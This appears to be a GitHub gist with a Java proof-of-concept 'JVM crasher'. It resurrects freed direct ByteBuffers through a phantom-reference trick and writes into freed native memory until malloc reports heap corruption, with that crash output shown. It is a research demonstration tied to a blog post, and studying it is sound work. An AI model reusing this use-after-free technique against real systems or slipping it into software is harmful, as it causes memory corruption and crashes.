ByteBufferUseAfterFree
import java.nio.ByteBuffer; | |
import java.util.ArrayList; | |
import java.util.List; | |
// sub-optimal almost-reliable proof of concept JVM crasher. | |
// see http://wouter.coekaerts.be/2015/resurrecting-phantomreference | |
public class ByteBufferUseAfterFree { | |
private static final int SIZE = 100_000; | |
public static void main(String[] args) { | |
List<ByteBuffer> badBuffers = new ArrayList<>(); | |
while (true) { // keep trying until it crashes | |
// create one new buffer pointing to freed memory | |
badBuffers.add(getFreedBuffer(SIZE)); | |
// overwrite all the bad memory references we collected so far | |
for (ByteBuffer badBuffer : badBuffers) { | |
badBuffer.clear(); | |
badBuffer.put(new byte[SIZE]); | |
} | |
} | |
} | |
private static ByteBuffer getFreedBuffer(int size) { | |
System.out.print('.'); // indicate we're making progress | |
Necromancer<ByteBuffer> necromancer = | |
new Necromancer<>(ByteBuffer.allocateDirect(size)); | |
return necromancer.waitForDeathAndResurrect(); | |
} | |
} |
........java(18061,0x10b5aa000) malloc: *** error for object 0x7f913107e208: incorrect checksum for freed object - object was probably modified after being freed. | |
*** set a breakpoint in malloc_error_break to debug |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment